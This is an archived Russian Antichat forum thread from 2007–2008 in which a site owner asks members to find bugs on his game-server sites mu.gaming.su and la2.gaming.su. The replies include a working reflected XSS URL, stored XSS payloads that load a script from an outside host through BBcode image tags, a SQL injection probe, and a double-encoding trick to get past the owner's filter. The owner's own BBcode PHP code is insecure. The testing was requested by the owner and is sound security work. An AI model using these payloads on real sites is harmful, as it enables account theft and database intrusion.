La2.Gaming.Su,Mu.Gaming.Su [Архив] - Форум АНТИЧАТ

PDA

Просмотр полной версии : La2.Gaming.Su,Mu.Gaming.Su

EST a1ien

24.10.2007, 11:04

http://la2.gaming.su
http://mu.gaming.su
Естественно за каждый баг с меня репа.

sw04

24.10.2007, 17:01

вбуллетин и хтмл морда, разве это по правилам?

guest3297

24.10.2007, 17:03

размести на сайте в корне
test.txt
c текстом test antichat.

EST a1ien

24.10.2007, 17:10

Ок вечером сделаю щас просто с мобилы

2sw04 недумал что так тяжело догадатья про мод-реврайт

[dword]

24.10.2007, 18:53

validator.php с форума стоило бы удалить ну или спрятать хотябы :) бэкапов не нашел вроде %),
админка следовательно MU_G_admincp/index.php

EST a1ien

24.10.2007, 19:56

2[cash] создал

[dword]

24.10.2007, 21:56

+ Не удалены инсталяционные файлы чата... ты бы хоть от дураков форум отгородил бы )

LLITiF

25.10.2007, 09:45

validator.php убран.
чат удалён.

blackybr

25.10.2007, 10:26

Открыта*

ЗЫ люди проверяйте не гейминг.су.. а сайты упомянутые ТС

Spyder

25.10.2007, 18:18

BlackCats
это просто глюки мсскл. Переведи первую ошибку
Unable to connect to server: mssql_gaming80

*все норм работает

RenGen

25.10.2007, 20:50

XSS

http://mu.gaming.su/index.php?page=comments&id=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

быра исправляй:)

EST a1ien

26.10.2007, 13:27

Там в коментах вобще можно было добиться sql-inj. Не одна переменная в коментах не фильтровалась.

Пофиксил!!!

EST a1ien

26.10.2007, 14:04

Ди и еще что думаете по поводу вот такой реализации BBcode
function bbcode($text)
{
global $db_var;
$text = BBparseurls($text);
$text = " ".$text;

$bbcodes1 = array(
'$' => '$',
'' => '<strong>',
'' => '</strong>',
'' => '<p>',
'' => '</p>',
'' => '<u>',
'' => '</u>',
'' => '<em>',
'' => '</em>',
'[hr]' => '<hr />',
'[li]' => '<li>',
'[_]' => ' ',
'[__]' => '   ',
'' => '<span style="color:#F93737">',
'' => '</span>',
'' => '<span style="color:#FFFFFF">',
'' => '</span>',
'' => '<span style="color:#09DD09">',
'' => '</span>',
'' => '<span style="color:#018BFF">',
'' => '</span>',
'' => '<span style="color:#FF9900">',
'' => '</span>',
'' => '<span style="color:#FFFF00">',
'' => '</span>',
'' => '<span style="color:#A22ADA">',
'' => '</span>',
'' => '<span style="color:#000000">',
'' => '</span>',
'' => '<span style="color:#B9B9B9">',
'' => '</span>',
'' => '<span style="color:#FFC0FF">',
'' => '</span>',
'' => '<span style="color:#D1F4F9">',
'' => '</span>',
'' => '<span style="color:#171A97">',
'' => '</span>',
'' => '<sub>',
'' => '</sub>',
'' => '<sup>',
'' => '</sup>',
'' => '<blockquote><hr />',
'' => '<hr /></blockquote>',
'[br]' => '<br />'
);
$links=explode('|',$db_var['link']);
$bbcodes2 = array(
'\\[img\\]([^\\\'\;\?([]*)\.(jpg|jpeg|gif|png)\\[/img\\]' => '<img src="\\1.\\2" alt="" />',
'\\[img=([^\\\'\;\?([]*)\.(jpg|jpeg|gif|png)\\]([^\\[]*)\.(jpg|jpeg|gif|png)\\[/img\\]' => '<a href="\\1.\\2"><img src="\\3.\\4" alt="" /></a>',
'\\[thumb=([^\\\'\;\?([]*)\.(jpg|jpeg|gif|png)\\]([^\\[]*)\.(jpg|jpeg|gif|png)\\[/thumb\\]' => ' <a href="pfs.php?m=view&v=\\3.\\4"><img src="\\1.\\2" alt="" /></a>',
'\\[t=([^\\\'\;\?([]*)\.(jpg|jpeg|gif|png)\\]([^\\[]*)\.(jpg|jpeg|gif|png)\\[/t\\]' => '<a href="\\3.\\4"><img src="\\1.\\2" alt="" /></a>',
'\\*)\\]([^\\[]*)\\[/url\\]' => $links[0].'"\\1">\\2'.$links[1],
'\\[url\\]([^\\([]*)\\[/url\\]' => $links[0].'"\\1">\\1'.$links[1],
'\\*)\\]([^\\[]*)\\[/urlb\\]' => '<a class="ll3" target="_blank" href="\\1">\\2</a>',
'\\[urlb\\]([^\\([]*)\\[/urlb\\]' => '<a class="ll3" target="_blank" href="\\1">\\1</a>',
'\\[color=([a-zA-Z]*|\#?[0-9a-fA-F]{6})\\]([^\\[]*)\\[/color\\]' => '<span style="color:\\1">\\2</span>',
'\\[class=([0-9a-zA-Z]{1,10})\\]([^\\[]*)\\[/class\\]' => '<span class="\\1">\\2</span>',
'\\[style=([1-9]{1})\\]([^\\[]*)\\[/style\\]' => '<span class="bbstyle\\1">\\2</span>',
'\\[size=([1-9]{1})\\]([^\\[]*)\\[/size\\]' => '<h\\1>\\2</h\\1>',
'\\[email=([._A-z0-9-]+@[_A-z0-9-]+\.[.a-z]+)\\]([^\\[]*)\\[/email\\]' => '<a href="mailto:\\1">\\2</a>',
'\\[email\\]([._A-z0-9-]+@[_A-z0-9-]+\.[.a-z]+)\\[/email\\]' => '<a href="mailto:\\1">\\1</a>',
'\\[user=([0-9]+)\\]([A-z0-9_\. ]+)\\[/user\\]' => '<a href="users.php?m=details&id=\\1">\\2</a>',
'\\[ac=([^\\[]*)\\]([^\\[]*)\\[/ac\\]' => '<acronym title="\\1">\\2</acronym>',
'\\[list=([a-zA-Z]*)\\]([^\\[]*)\\[/list\\]' => '<ul type="\\1">\\2</ul>',
'\\[list\\]([^\\[]*)\\[/list\\]' => '<ul>\\1</ul>',
'\\[icq\\]([1-9]{1,9})\\[/icq\\]' => '<a href="http://www.icq.com/\\1#pager"><img border=0 src="http://status.icq.com/online.gif?icq=\\1&img=5" alt="" /></a>',
'\\[quote=([^\\[]*)\\]' => '<blockquote>\\1<hr />',
'\\[colleft\\]([^\\[]*)\\[/colleft\\]' => '<div class="colleft">\\1</div>',
'\\[colright\\]([^\\[]*)\\[/colright\\]' => '<div class="colright">\\1</div>',
'\\[center\\]([^\\[]*)\\[/center\\]' => '<div style="text-align:center;">\\1</div>',
'\\[right\\]([^\\[]*)\\[/right\\]' => '<div style="text-align:right;">\\1</div>',
'\\[left\\]([^\\[]*)\\[/left\\]' => '<div style="text-align:left;">\\1</div>'
);

foreach($bbcodes1 as $bbcode => $bbcodehtml)
{ $text = str_replace($bbcode,$bbcodehtml,$text); }

foreach($bbcodes2 as $bbcode => $bbcodehtml)
{ $text = eregi_replace($bbcode,$bbcodehtml,$text); }

return(substr($text,1));
}

/* ------------------ */

function BBparseurls($text)
{
$text = ' '.$text;
$text = preg_replace("#([\n ])([a-z0-9]+?)://([^\t \n\r]+)#i", "\\1[urlb]\\2://\\3", $text);
$text = preg_replace("#([\n ])([a-z0-9]+?)://([^\t \n\r]+)#i", "\\1[url]\\2://\\3 (([^\\\'\;([)", $text);
$text = preg_replace("#([\n ])([a-z0-9-_.]+?@[A-z0-9-]+\.[^,\t \n\r]+)#i", "\\1\\2", $text);
return(substr($text,1));
}
Нету тут нечего критического?

Ponchik

04.01.2008, 21:51

В верхнем правом углу ссылка на регу ведёт на мертвую ссыль http://mu.gaming.su/register.html

Macro

04.01.2008, 22:28

Ди и еще что думаете по поводу вот такой реализации BBcode

Нету тут нечего критического?
Активные xss

"style="display:none"><script src="http://site.ru/script.js"></script><img".jpg

"style="display:none"><script src="http://site.ru/script.js"></script><img".jpg

"style="display:none"><script src="http://site.ru/script.js"></script><img".jpg

Короче говоря там активные xss почти в каждом теге есть :)

Scipio

05.01.2008, 13:03

хм cервер off не успел, а была скуля:
http://mu.gaming.su/index.php?page=searchguild&guild=DarkS'/**/order/**/by/**/11+--+
ну вобщем там скуля налицо была, теперь вобще ничего не отображается

EST a1ien

05.03.2008, 22:06

Ребята где вы их там нашли???? я эти баге на сайте и не нашел. Скуля там по определению быть не может! особенно того что ты пихал
if(isset($_GET['guild']))
{
$guild = $_GET['guild'];

if (eregi("[a-zA-Z0-9_-~/\%()=+><]", $guild))
{

Да и XSS не подтвердились.

Isis

06.03.2008, 02:24

EST a1ien, все можно заменить на %XX , где хх допустим теже кавычки
%2527 подходит под твою регулярку

EST a1ien

08.03.2008, 20:29

Ну заменить то можно. Но он пойдет как связка символов %27 тоесть в запросе будет %27 и все. Проверял. Или я вчемто не прав?

9822

15.03.2008, 19:12

под world of warcraft зделай дизайн =)